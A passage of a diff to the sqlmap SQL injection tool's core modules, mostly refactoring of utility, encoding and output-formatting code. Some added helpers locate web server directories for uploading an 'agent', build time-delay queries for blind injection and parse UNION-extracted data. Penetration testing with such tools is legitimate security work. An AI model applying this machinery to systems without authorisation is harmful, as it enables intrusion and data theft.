+                    docRoot = "C:/%s" % ntToPosixSlashes(docRoot)
+                    
+                docRoot = normalizePath(docRoot)
                break

    if docRoot:
-        logMsg  = "retrieved the remote web server "
-        logMsg += "document root: '%s'" % docRoot
-        logger.info(logMsg)
+        infoMsg = "retrieved the web server document root: '%s'" % docRoot
+        logger.info(infoMsg)
    else:
-        warnMsg  = "unable to retrieve the remote web server "
-        warnMsg += "document root"
+        warnMsg = "unable to retrieve the web server document root"
        logger.warn(warnMsg)

+        message  = "please provide the web server document root "
+        message += "[%s]: " % defaultDocRoot
+        inputDocRoot = readInput(message, default=defaultDocRoot)
+
+        if inputDocRoot:
+            docRoot = inputDocRoot
+        else:
+            docRoot = defaultDocRoot
+
    return docRoot

-
-def getDirectories():
-    """
-    This method calls a function that returns the web application document
-    root and injectable file absolute system path.
-
-    @return: a set of paths (document root and absolute system path).
-    @rtype: C{set}
-    @todo: replace this function with a site crawling functionality.
-    """
-
+def getDirs(webApi=None):
    directories = set()

-    kb.docRoot = getDocRoot()
+    if kb.os == "Windows":
+        if webApi == "php":
+            defaultDirs = ["C:/xampp/htdocs/"]
+        else:
+            defaultDirs = ["C:/Inetpub/wwwroot/"]
+    else:
+        defaultDirs = ["/var/www/"]

-    if kb.docRoot:
-        directories.add(kb.docRoot)
+    if kb.absFilePaths:
+        infoMsg  = "retrieved web server full paths: "
+        infoMsg += "'%s'" % ", ".join(path for path in kb.absFilePaths)
+        logger.info(infoMsg)
        
-    pagePath = re.search('^/(.*)/', conf.path)
+        for absFilePath in kb.absFilePaths:
+            if absFilePath:
+                directory = directoryPath(absFilePath)
+                if isWindowsPath(directory):
+                    directory = directory.replace('\\', '/')
+                if directory == '/':
+                    continue
+                directories.add(directory)
+    else:
+        warnMsg = "unable to retrieve any web server path"
+        logger.warn(warnMsg)

-    if kb.docRoot and pagePath:
-        pagePath = pagePath.groups()[0]
+    message   = "please provide any additional web server full path to try "
+    message  += "to upload the agent [%s]: " % ",".join(directory for directory in defaultDirs)
+    inputDirs = readInput(message, default=",".join(directory for directory in defaultDirs))

-        directories.add("%s/%s" % (kb.docRoot, pagePath))
+    if inputDirs:
+        inputDirs = inputDirs.replace(", ", ",")
+        inputDirs = inputDirs.split(",")
+
+        for inputDir in inputDirs:
+            if inputDir:
+                directories.add(inputDir)
+    else:
+        [directories.add(directory) for directory in defaultDirs]

    return directories
    
-
 def filePathToString(filePath):
-    string = filePath.replace("/", "_").replace("\\", "_")
-    string = string.replace(" ", "_").replace(":", "_")
-
-    return string
+    strRepl = filePath.replace("/", "_").replace("\\", "_")
+    strRepl = strRepl.replace(" ", "_").replace(":", "_")

+    return strRepl

 def dataToStdout(data):
    sys.stdout.write(data)
    sys.stdout.flush()
    
-
 def dataToSessionFile(data):
    if not conf.sessionFile:
        return
@@ -236,24 +340,36 @@ def dataToSessionFile(data):
    conf.sessionFP.write(data)
    conf.sessionFP.flush()
    
-
 def dataToDumpFile(dumpFile, data):
    dumpFile.write(data)
    dumpFile.flush()
    
+def dataToOutFile(data):
+    if not data:
+        return "No data retrieved"

-def strToHex(string):
+    rFile     = filePathToString(conf.rFile)
+    rFilePath = "%s%s%s" % (conf.filePath, os.sep, rFile)
+    rFileFP   = open(rFilePath, "wb")
+
+    rFileFP.write(data)
+    rFileFP.flush()
+    rFileFP.close()
+
+    return rFilePath
+
+def strToHex(inpStr):
    """
-    @param string: string to be converted into its hexadecimal value.
-    @type string: C{str}
+    @param inpStr: inpStr to be converted into its hexadecimal value.
+    @type inpStr: C{str}

-    @return: the hexadecimal converted string.
+    @return: the hexadecimal converted inpStr.
    @rtype: C{str}
    """

    hexStr = ""

-    for character in string:
+    for character in inpStr:
        if character == "\n":
            character = " "

@@ -265,7 +381,6 @@ def strToHex(string):

    return hexStr
        
-
 def fileToStr(fileName):
    """
    @param fileName: file path to read the content and return as a no
@@ -279,13 +394,7 @@ def fileToStr(fileName):
    filePointer = open(fileName, "r")
    fileText = filePointer.read()

-    fileText = fileText.replace("    ", "")
-    fileText = fileText.replace("\t", "")
-    fileText = fileText.replace("\r", "")
-    fileText = fileText.replace("\n", " ")
-
-    return fileText
-
+    return fileText.replace("    ", "").replace("\t", "").replace("\r", "").replace("\n", " ")

 def fileToHex(fileName):
    """
@@ -302,7 +411,6 @@ def fileToHex(fileName):

    return hexFile

-
 def readInput(message, default=None):
    """
    @param message: message to display on terminal.
@@ -312,6 +420,9 @@ def readInput(message, default=None):
    @rtype: C{str}
    """

+    if "\n" in message:
+        message += "\n> "
+
    if conf.batch and default:
        infoMsg = "%s%s" % (message, str(default))
        logger.info(infoMsg)
@@ -321,11 +432,13 @@ def readInput(message, default=None):

        data = default
    else:
-        data = raw_input("[%s] [INPUT] %s" % (time.strftime("%X"), message))
+        data = raw_input(message)
+
+        if not data:
+            data = default

    return data
        
-
 def randomRange(start=0, stop=1000):
    """
    @param start: starting number.
@@ -340,7 +453,6 @@ def randomRange(start=0, stop=1000):

    return int(random.randint(start, stop))

-
 def randomInt(length=4):
    """
    @param length: length of the random string.
@@ -352,8 +464,7 @@ def randomInt(length=4):

    return int("".join([random.choice(string.digits) for _ in xrange(0, length)]))

-
-def randomStr(length=5):
+def randomStr(length=4, lowercase=False):
    """
    @param length: length of the random string.
    @type length: C{int}
@@ -362,25 +473,28 @@ def randomStr(length=5):
    @rtype: C{str}
    """

-    return "".join([random.choice(string.letters) for _ in xrange(0, length)])
+    if lowercase:
+        rndStr = "".join([random.choice(string.lowercase) for _ in xrange(0, length)])
+    else:
+        rndStr = "".join([random.choice(string.letters) for _ in xrange(0, length)])

+    return rndStr
    
-def sanitizeStr(string):
+def sanitizeStr(inpStr):
    """
-    @param string: string to sanitize: cast to str datatype and replace
+    @param inpStr: inpStr to sanitize: cast to str datatype and replace
    newlines with one space and strip carriage returns.
-    @type string: C{str}
+    @type inpStr: C{str}

-    @return: sanitized string
+    @return: sanitized inpStr
    @rtype: C{str}
    """

-    cleanString = str(string)
+    cleanString = str(inpStr)
    cleanString = cleanString.replace("\n", " ").replace("\r", "")

    return cleanString

-
 def checkFile(filename):
    """
    @param filename: filename to check if it exists.
@@ -390,24 +504,21 @@ def checkFile(filename):
    if not os.path.exists(filename):
        raise sqlmapFilePathException, "unable to read file '%s'" % filename
    
-
-def replaceNewlineTabs(string):
-    replacedString = string.replace("\n", "__NEWLINE__").replace("\t", "__TAB__")
+def replaceNewlineTabs(inpStr):
+    replacedString = inpStr.replace("\n", "__NEWLINE__").replace("\t", "__TAB__")
    replacedString = replacedString.replace(temp.delimiter, "__DEL__")

    return replacedString

-
 def banner():
    """
    This function prints sqlmap banner with its version
    """

    print """
-    %s coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
-    """ % VERSION_STRING
-
+    %s - %s
+    %s
+    """ % (VERSION_STRING, DESCRIPTION, SITE)
    
 def parsePasswordHash(password):
    blank = " " * 8
@@ -427,36 +538,43 @@ def parsePasswordHash(password):

    return password

-
 def cleanQuery(query):
-    upperQuery = query.replace("select ", "SELECT ")
-    upperQuery = upperQuery.replace(" from ", " FROM ")
-    upperQuery = upperQuery.replace(" limit ", " LIMIT ")
-    upperQuery = upperQuery.replace(" offset ", " OFFSET ")
-    upperQuery = upperQuery.replace(" order by ", " ORDER BY ")
-    upperQuery = upperQuery.replace(" group by ", " GROUP BY ")
-    upperQuery = upperQuery.replace(" union all ", " UNION ALL ")
+    upperQuery = query
+
+    for sqlStatements in SQL_STATEMENTS.values():
+        for sqlStatement in sqlStatements:
+            sqlStatementEsc = sqlStatement.replace("(", "\\(")
+            queryMatch = re.search("(%s)" % sqlStatementEsc, query, re.I)
+
+            if queryMatch:
+                upperQuery = upperQuery.replace(queryMatch.group(1), sqlStatement.upper())

    return upperQuery
            
-
 def setPaths():
    # sqlmap paths
-    paths.SQLMAP_SHELL_PATH  = "%s/shell" % paths.SQLMAP_ROOT_PATH
-    paths.SQLMAP_TXT_PATH    = "%s/txt" % paths.SQLMAP_ROOT_PATH
-    paths.SQLMAP_XML_PATH    = "%s/xml" % paths.SQLMAP_ROOT_PATH
-    paths.SQLMAP_OUTPUT_PATH = "%s/output" % paths.SQLMAP_ROOT_PATH
-    paths.SQLMAP_DUMP_PATH   = paths.SQLMAP_OUTPUT_PATH + "/%s/dump"
-    paths.SQLMAP_FILES_PATH  = paths.SQLMAP_OUTPUT_PATH + "/%s/files"
+    paths.SQLMAP_CONTRIB_PATH    = os.path.join(paths.SQLMAP_ROOT_PATH, "lib", "contrib")
+    paths.SQLMAP_SHELL_PATH      = os.path.join(paths.SQLMAP_ROOT_PATH, "shell")
+    paths.SQLMAP_TXT_PATH        = os.path.join(paths.SQLMAP_ROOT_PATH, "txt")
+    paths.SQLMAP_UDF_PATH        = os.path.join(paths.SQLMAP_ROOT_PATH, "udf")
+    paths.SQLMAP_XML_PATH        = os.path.join(paths.SQLMAP_ROOT_PATH, "xml")
+    paths.SQLMAP_XML_BANNER_PATH = os.path.join(paths.SQLMAP_XML_PATH, "banner")
+    paths.SQLMAP_OUTPUT_PATH     = os.path.join(paths.SQLMAP_ROOT_PATH, "output")
+    paths.SQLMAP_DUMP_PATH       = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
+    paths.SQLMAP_FILES_PATH      = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")

    # sqlmap files
-    paths.SQLMAP_HISTORY    = "%s/.sqlmap_history" % paths.SQLMAP_ROOT_PATH
-    paths.SQLMAP_CONFIG     = "%s/sqlmap-%s.conf" % (paths.SQLMAP_ROOT_PATH, randomStr())
-    paths.FUZZ_VECTORS      = "%s/fuzz_vectors.txt" % paths.SQLMAP_TXT_PATH
-    paths.ERRORS_XML        = "%s/errors.xml" % paths.SQLMAP_XML_PATH
-    paths.MSSQL_XML         = "%s/mssql.xml" % paths.SQLMAP_XML_PATH
-    paths.QUERIES_XML       = "%s/queries.xml" % paths.SQLMAP_XML_PATH
-
+    paths.SQLMAP_HISTORY         = os.path.join(paths.SQLMAP_ROOT_PATH, ".sqlmap_history")
+    paths.SQLMAP_CONFIG          = os.path.join(paths.SQLMAP_ROOT_PATH, "sqlmap-%s.conf" % randomStr())
+    paths.FUZZ_VECTORS           = os.path.join(paths.SQLMAP_TXT_PATH, "fuzz_vectors.txt")
+    paths.DETECTION_RULES_XML    = os.path.join(paths.SQLMAP_XML_PATH, "detection.xml")
+    paths.ERRORS_XML             = os.path.join(paths.SQLMAP_XML_PATH, "errors.xml")
+    paths.QUERIES_XML            = os.path.join(paths.SQLMAP_XML_PATH, "queries.xml")
+    paths.GENERIC_XML            = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "generic.xml")
+    paths.MSSQL_XML              = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "mssql.xml")
+    paths.MYSQL_XML              = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "mysql.xml")
+    paths.ORACLE_XML             = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "oracle.xml")
+    paths.PGSQL_XML              = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "postgresql.xml")
    
 def weAreFrozen():
    """
@@ -467,7 +585,6 @@ def weAreFrozen():

    return hasattr(sys, "frozen")

-
 def parseTargetUrl():
    """
    Parse target url and set some attributes into the configuration
@@ -491,31 +608,39 @@ def parseTargetUrl():
    conf.hostname  = __hostnamePort[0]

    if len(__hostnamePort) == 2:
+        try:
            conf.port = int(__hostnamePort[1])
+        except:
+            errMsg = "invalid target url"
+            raise sqlmapSyntaxException, errMsg
    elif conf.scheme == "https":
        conf.port = 443
    else:
        conf.port = 80

    if __urlSplit[3]:
-        conf.parameters["GET"] = urldecode(__urlSplit[3]).replace("%", "%%")
+        conf.parameters["GET"] = __urlSplit[3]

    conf.url = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, conf.path)
    
-
 def expandAsteriskForColumns(expression):
    # If the user provided an asterisk rather than the column(s)
    # name, sqlmap will retrieve the columns itself and reprocess
    # the SQL query string (expression)
-    asterisk = re.search("^SELECT\s+\*\s+FROM\s+(\w+)[\.]+(\w+)\s*", expression, re.I)
+    asterisk = re.search("^SELECT\s+\*\s+FROM\s+([\w\.\_]+)\s*", expression, re.I)

    if asterisk:
        infoMsg  = "you did not provide the fields in your query. "
        infoMsg += "sqlmap will retrieve the column names itself"
        logger.info(infoMsg)

-        conf.db = asterisk.group(1)
-        conf.tbl = asterisk.group(2)
+        dbTbl = asterisk.group(1)
+
+        if dbTbl and "." in dbTbl:
+            conf.db, conf.tbl = dbTbl.split(".")
+        else:
+            conf.tbl = dbTbl
+
        columnsDict = conf.dbmsHandler.getColumns(onlyColNames=True)

        if columnsDict and conf.db in columnsDict and conf.tbl in columnsDict[conf.db]:
@@ -530,8 +655,7 @@ def expandAsteriskForColumns(expression):

    return expression

-
-def getRange(count, dump=False):
+def getRange(count, dump=False, plusOne=False):
    count      = int(count)
    indexRange = None
    limitStart = 1
@@ -544,10 +668,277 @@ def getRange(count, dump=False):
        if isinstance(conf.limitStart, int) and conf.limitStart > 0 and conf.limitStart <= limitStop:
            limitStart = conf.limitStart

-    # TODO: also for Microsoft SQL Server in getColumns method?
-    if kb.dbms == "Oracle":
+    if plusOne:
        indexRange = range(limitStart, limitStop + 1)
    else:
        indexRange = range(limitStart - 1, limitStop)

    return indexRange
+    
+def parseUnionPage(output, expression, partial=False, condition=None, sort=True):
+    data = []
+
+    outCond1 = ( output.startswith(temp.start) and output.endswith(temp.stop) )
+    outCond2 = ( output.startswith("__START__") and output.endswith("__STOP__") )
+
+    if outCond1 or outCond2:
+        if outCond1:
+            regExpr = '%s(.*?)%s' % (temp.start, temp.stop)
+        elif outCond2:
+            regExpr = '__START__(.*?)__STOP__'
+
+        output = re.findall(regExpr, output, re.S)
+
+        if condition is None:
+            condition = (
+                          kb.resumedQueries and conf.url in kb.resumedQueries.keys()
+                          and expression in kb.resumedQueries[conf.url].keys()
+                        )
+
+        if partial or not condition:
+            logOutput = "".join(["__START__%s__STOP__" % replaceNewlineTabs(value) for value in output])
+            dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], expression, logOutput))
+
+        if sort:
+            output = set(output)
+
+        for entry in output:
+            info = []
+
+            if "__DEL__" in entry:
+                entry = entry.split("__DEL__")
+            else:
+                entry = entry.split(temp.delimiter)
+
+            if len(entry) == 1:
+                data.append(entry[0])
+            else:
+                for value in entry:
+                    info.append(value)
+
+                data.append(info)
+    else:
+        data = output
+
+    if len(data) == 1 and isinstance(data[0], str):
+        data = data[0]
+
+    return data
+
+def getDelayQuery(andCond=False):
+    query = None
+
+    if kb.dbms in ("MySQL", "PostgreSQL"):
+        if not kb.data.banner:
+            conf.dbmsHandler.getVersionFromBanner()
+
+        banVer = kb.bannerFp["dbmsVersion"]
+
+        if (kb.dbms == "MySQL" and banVer >= "5.0.12") or (kb.dbms == "PostgreSQL" and banVer >= "8.2"):
+            query = queries[kb.dbms].timedelay % conf.timeSec
+
+            if kb.dbms == "MySQL" and andCond:
+                query = query.replace("SELECT ", "")
+
+        else:
+            query = queries[kb.dbms].timedelay2 % conf.timeSec
+    else:
+        query = queries[kb.dbms].timedelay % conf.timeSec
+
+    return query
+    
+def getLocalIP():
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect((conf.hostname, conf.port))
+    ip, _ = s.getsockname()
+    s.close()
+
+    return ip
+
+def getRemoteIP():
+    return socket.gethostbyname(conf.hostname)
+
+def getFileType(filePath):
+    try:
+        magicFileType = magic.from_file(filePath)
+    except:
+        return "unknown"
+
+    if "ASCII" in magicFileType or "text" in magicFileType:
+        return "text"
+    else:
+        return "binary"
+    
+def pollProcess(process):
+    while True:
+        dataToStdout(".")
+        time.sleep(1)
+
+        returncode = process.poll()
+
+        if returncode is not None:
+            if returncode == 0:
+                dataToStdout(" done\n")
+            elif returncode < 0:
+                dataToStdout(" process terminated by signal %d\n" % returncode)
+            elif returncode > 0:
+                dataToStdout(" quit unexpectedly with return code %d\n" % returncode)
+
+            break
+            
+def getCharset(charsetType=None):
+    asciiTbl = []
+
+    if charsetType is None:
+        asciiTbl = range(0, 128)
+
+    # 0 or 1
+    elif charsetType == 1:
+        asciiTbl.extend([ 0, 1 ])
+        asciiTbl.extend(range(47, 50))
+
+    # Digits
+    elif charsetType == 2:
+        asciiTbl.extend([ 0, 1 ])
+        asciiTbl.extend(range(47, 58))
+
+    # Hexadecimal
+    elif charsetType == 3:
+        asciiTbl.extend([ 0, 1 ])
+        asciiTbl.extend(range(47, 58))
+        asciiTbl.extend(range(64, 71))
+        asciiTbl.extend(range(96, 103))
+
+    # Characters
+    elif charsetType == 4:
+        asciiTbl.extend([ 0, 1 ])
+        asciiTbl.extend(range(64, 91))
+        asciiTbl.extend(range(96, 123))
+
+    # Characters and digits
+    elif charsetType == 5:
+        asciiTbl.extend([ 0, 1 ])
+        asciiTbl.extend(range(47, 58))
+        asciiTbl.extend(range(64, 91))
+        asciiTbl.extend(range(96, 123))
+
+    return asciiTbl
+    
+def searchEnvPath(fileName):
+    envPaths = os.environ["PATH"]
+    result = None
+
+    if IS_WIN:
+        envPaths = envPaths.split(";")
+    else:
+        envPaths = envPaths.split(":")
+
+    for envPath in envPaths:
+        envPath = envPath.replace(";", "")
+        result = os.path.exists(os.path.normpath(os.path.join(envPath, fileName)))
+
+        if result:
+            break
+
+    return result
+
+def urlEncodeCookieValues(cookieStr):
+    if cookieStr:
+        result = ""
+        for part in cookieStr.split(';'):
+            index = part.find('=') + 1
+            if index > 0:
+                name = part[:index - 1].strip()
+                value = urlencode(part[index:], convall=True)
+                result += "; %s=%s" % (name, value)
+            elif part.strip().lower() != "secure":
+                result += "%s%s" % ("%3B", urlencode(part, convall=True))
+            else:
+                result += "; secure"
+        if result.startswith('; '):
+            result = result[2:]
+        elif result.startswith('%3B'):
+            result = result[3:]
+        return result
+    else:
+        return None
+
+def directoryPath(path):
+    retVal = None
+    if isWindowsPath(path):
+        retVal = ntpath.dirname(path)
+    else:
+        retVal = posixpath.dirname(path)
+    return retVal
+
+def normalizePath(path):
+    """
+    This function must be called only after posixToNtSlashes()
+    and ntToPosixSlashes()
+    """
+
+    retVal = None
+
+    if isWindowsPath(path):
+        retVal = ntpath.normpath(path)
+    else:
+        retVal = posixpath.normpath(path)
+
+    return retVal
+
+def safeStringFormat(formatStr, params):
+    retVal = formatStr.replace('%d', '%s')
+
+    if isinstance(params, str):
+        retVal = retVal.replace("%s", params)
+    else:
+        count = 0
+        index = 0
+
+        while index != -1:
+            index = retVal.find('%s')
+
+            if index != -1:
+                if count < len(params):
+                    retVal = retVal[:index] + str(params[count]) + retVal[index+2:]
+                else:
+                    raise sqlmapNoneDataException, "wrong number of parameters during string formatting"
+                count += 1
+
+    return retVal
+
+def sanitizeAsciiString(string):
+    return "".join(char if ord(char) < 128 else '?' for char in string)
+
+def decloakToNamedTemporaryFile(filepath, name=None):
+    retVal = NamedTemporaryFile()
+    def __del__():
+        try:
+            if hasattr(retVal, 'old_name'):
+                retVal.name = old_name
+            retVal.close()
+        except OSError:
+            pass
+    retVal.__del__ = __del__
+    retVal.write(decloak(filepath))
+    retVal.seek(0)
+    if name:
+        retVal.old_name = retVal.name
+        retVal.name = name
+    return retVal
+
+def decloakToMkstemp(filepath, **kwargs):
+    name = mkstemp(**kwargs)[1]
+    retVal = open(name, 'w+b')
+    retVal.write(decloak(filepath))
+    retVal.seek(0)
+    return retVal
+
+def isWindowsPath(filepath):
+    return re.search("\A[\w]\:\\\\", filepath) is not None
+
+def posixToNtSlashes(filepath):
+    return filepath.replace('/', '\\')
+
+def ntToPosixSlashes(filepath):
+    return filepath.replace('\\', '/')
--- a/lib/core/convert.py
+++ b/lib/core/convert.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,22 +22,22 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
+try:
+    import hashlib
+except:
    import md5
    import sha
+    
+import sys
 import struct
 import urllib

-
 def base64decode(string):
    return string.decode("base64")

-
 def base64encode(string):
    return string.encode("base64")[:-1]

-
 def hexdecode(string):
    string = string.lower()

@@ -46,41 +46,45 @@ def hexdecode(string):

    return string.decode("hex")
    
-
 def hexencode(string):
    return string.encode("hex")

-
 def md5hash(string):
+    if sys.modules.has_key('hashlib'):
+        return hashlib.md5(string).hexdigest()
+    else:
        return md5.new(string).hexdigest()

-
 def orddecode(string):
    packedString = struct.pack("!"+"I" * len(string), *string)
    return "".join([chr(char) for char in struct.unpack("!"+"I"*(len(packedString)/4), packedString)])

-
 def ordencode(string):
    return tuple([ord(char) for char in string])

-
 def sha1hash(string):
+    if sys.modules.has_key('hashlib'):
+        return hashlib.sha1(string).hexdigest()
+    else:
        return sha.new(string).hexdigest()

-
 def urldecode(string):
-    if not string:
-        return
+    result = None
    
-    doublePercFreeString = string.replace("%%", "__DPERC__")
-    unquotedString = urllib.unquote_plus(doublePercFreeString)
-    unquotedString = unquotedString.replace("__DPERC__", "%%")
+    if string:
+        result = urllib.unquote_plus(string)

-    return unquotedString
+    return result

+def urlencode(string, safe=":/?%&=", convall=False):
+    result = None

-def urlencode(string, safe=":/?%&="):
-    if not string:
-        return
+    if string is None:
+        return result

-    return urllib.quote(string, safe)
+    if convall:
+        result = urllib.quote(string)
+    else:
+        result = urllib.quote(string, safe)
+
+    return result
--- a/lib/core/data.py
+++ b/lib/core/data.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 from lib.core.datatype import advancedDict
 from lib.core.settings import LOGGER

--- a/lib/core/datatype.py
+++ b/lib/core/datatype.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,10 +22,8 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
 from lib.core.exception import sqlmapDataException

-
 class advancedDict(dict):
    """
    This class defines the sqlmap object, inheriting from Python data
@@ -45,7 +43,6 @@ class advancedDict(dict):
        # After initialisation, setting attributes
        # is the same as setting an item

-
    def __getattr__(self, item):
        """
        Maps values to attributes
@@ -57,7 +54,6 @@ class advancedDict(dict):
        except KeyError:
            raise sqlmapDataException, "Unable to access item '%s'" % item

-
    def __setattr__(self, item, value):
        """
        Maps attributes to values
--- a/lib/core/dump.py
+++ b/lib/core/dump.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,17 +22,13 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
-import re
 import os
+import re

 from lib.core.common import dataToDumpFile
-from lib.core.common import filePathToString
 from lib.core.data import conf
 from lib.core.data import logger

-
 class Dump:
    """
    This class defines methods used to parse and output the results
@@ -44,19 +40,10 @@ class Dump:
        self.__outputFile = None
        self.__outputFP   = None
        
-
-    def __write(self, data, n=True, rFile=False):
+    def __write(self, data, n=True):
        if n:
            print data
            self.__outputFP.write("%s\n" % data)
-
-            # TODO: do not duplicate queries output in the text file, check
-            # before if the data is already within the text file content
-            if rFile and conf.rFile:
-                rFile = filePathToString(conf.rFile)
-                rFileFP = open("%s%s%s" % (conf.filePath, os.sep, rFile), "w")
-                rFileFP.write(data)
-                rFileFP.close()
        else:
            print data,
            self.__outputFP.write("%s " % data)
@@ -65,35 +52,35 @@ class Dump:

        conf.loggedToOut = True
        
-
    def setOutputFile(self):
        self.__outputFile = "%s%slog" % (conf.outputPath, os.sep)
        self.__outputFP = open(self.__outputFile, "a")
        
-
-    def string(self, header, data):
+    def string(self, header, data, sort=True):
        if isinstance(data, (list, tuple, set)):
-            self.lister(header, data)
+            self.lister(header, data, sort)

            return

+        data = str(data)
+
        if data:
            data = data.replace("__NEWLINE__", "\n").replace("__TAB__", "\t")
            data = data.replace("__START__", "").replace("__STOP__", "")
            data = data.replace("__DEL__", ", ")

            if "\n" in data:
-                self.__write("%s:\n---\n%s---\n" % (header, data), rFile=header)
+                self.__write("%s:\n---\n%s---\n" % (header, data))
            else:
                self.__write("%s:    '%s'\n" % (header, data))
        else:
            self.__write("%s:\tNone\n" % header)
            
-
-    def lister(self, header, elements):
+    def lister(self, header, elements, sort=True):
        if elements:
            self.__write("%s [%d]:" % (header, len(elements)))

+        if sort:
            try:
                elements = set(elements)
                elements = list(elements)
@@ -110,7 +97,6 @@ class Dump:
        if elements:
            self.__write("")
            
-
    def userSettings(self, header, userSettings, subHeader):
        self.__areAdmins = set()

@@ -138,8 +124,42 @@ class Dump:
                self.__write("    %s: %s" % (subHeader, setting))
        print

+    def dbColumns(self, dbColumns, colConsider, dbs):
+        for column, dbTables in dbColumns.items():
+            if colConsider == "1":
+                colConsiderStr = "s like '" + column + "' were"
+            else:
+                colConsiderStr = " '%s' was" % column
+
+            msg  = "Column%s found in the " % colConsiderStr
+            msg += "following databases:"
+            self.__write(msg)
+
+            printDbs = {}
+
+            for db, tblData in dbs.items():
+                for tbl, colData in tblData.items():
+                    for col, dataType in colData.items():
+                        if column in col:
+                            if db in printDbs:
+                                if tbl in printDbs[db]:
+                                    printDbs[db][tbl][col] = dataType
+                                else:
+                                    printDbs[db][tbl] = { col: dataType }
+                            else:
+                                printDbs[db] = {}
+                                printDbs[db][tbl] = { col: dataType }
+
+                            continue
+
+            self.dbTableColumns(printDbs)

    def dbTables(self, dbTables):
+        if not isinstance(dbTables, dict):
+            self.string("tables", dbTables)
+
+            return
+
        maxlength = 0

        for tables in dbTables.values():
@@ -166,7 +186,6 @@ class Dump:

            self.__write("+%s+\n" % lines)

-
    def dbTableColumns(self, tableColumns):
        for db, tables in tableColumns.items():
            if not db:
@@ -182,11 +201,15 @@ class Dump:
                for column in colList:
                    colType = columns[column]
                    maxlength1 = max(maxlength1, len(column))
+
+                    if colType is not None:
                        maxlength2 = max(maxlength2, len(colType))

                maxlength1 = max(maxlength1, len("COLUMN"))
-                maxlength2 = max(maxlength2, len("TYPE"))
                lines1 = "-" * (int(maxlength1) + 2)
+
+                if colType is not None:
+                    maxlength2 = max(maxlength2, len("TYPE"))
                    lines2 = "-" * (int(maxlength2) + 2)

                self.__write("Database: %s\nTable: %s" % (db, table))
@@ -196,30 +219,48 @@ class Dump:
                else:
                    self.__write("[%d columns]" % len(columns))

+                if colType is not None:
                    self.__write("+%s+%s+" % (lines1, lines2))
+                else:
+                    self.__write("+%s+" % lines1)

                blank1 = " " * (maxlength1 - len("COLUMN"))
+
+                if colType is not None:
                    blank2 = " " * (maxlength2 - len("TYPE"))

+                if colType is not None:
                    self.__write("| Column%s | Type%s |" % (blank1, blank2))
                    self.__write("+%s+%s+" % (lines1, lines2))
+                else:
+                    self.__write("| Column%s |" % blank1)
+                    self.__write("+%s+" % lines1)

                for column in colList:
                    colType = columns[column]
                    blank1 = " " * (maxlength1 - len(column))
+
+                    if colType is not None:
                        blank2 = " " * (maxlength2 - len(colType))
                        self.__write("| %s%s | %s%s |" % (column, blank1, colType, blank2))
+                    else:
+                        self.__write("| %s%s |" % (column, blank1))

+                if colType is not None:
                    self.__write("+%s+%s+\n" % (lines1, lines2))
-
+                else:
+                    self.__write("+%s+\n" % lines1)

    def dbTableValues(self, tableValues):
+        if tableValues is None:
+            return
+
        db = tableValues["__infos__"]["db"]
        if not db:
            db = "All"
        table = tableValues["__infos__"]["table"]

-        if not conf.googleDork:
+        if not conf.multipleTargets:
            dumpDbPath = "%s%s%s" % (conf.dumpPath, os.sep, db)

            if not os.path.isdir(dumpDbPath):
@@ -257,17 +298,19 @@ class Dump:
                info      = tableValues[column]
                maxlength = int(info["length"])
                blank     = " " * (maxlength - len(column))
+
                self.__write("| %s%s" % (column, blank), n=False)

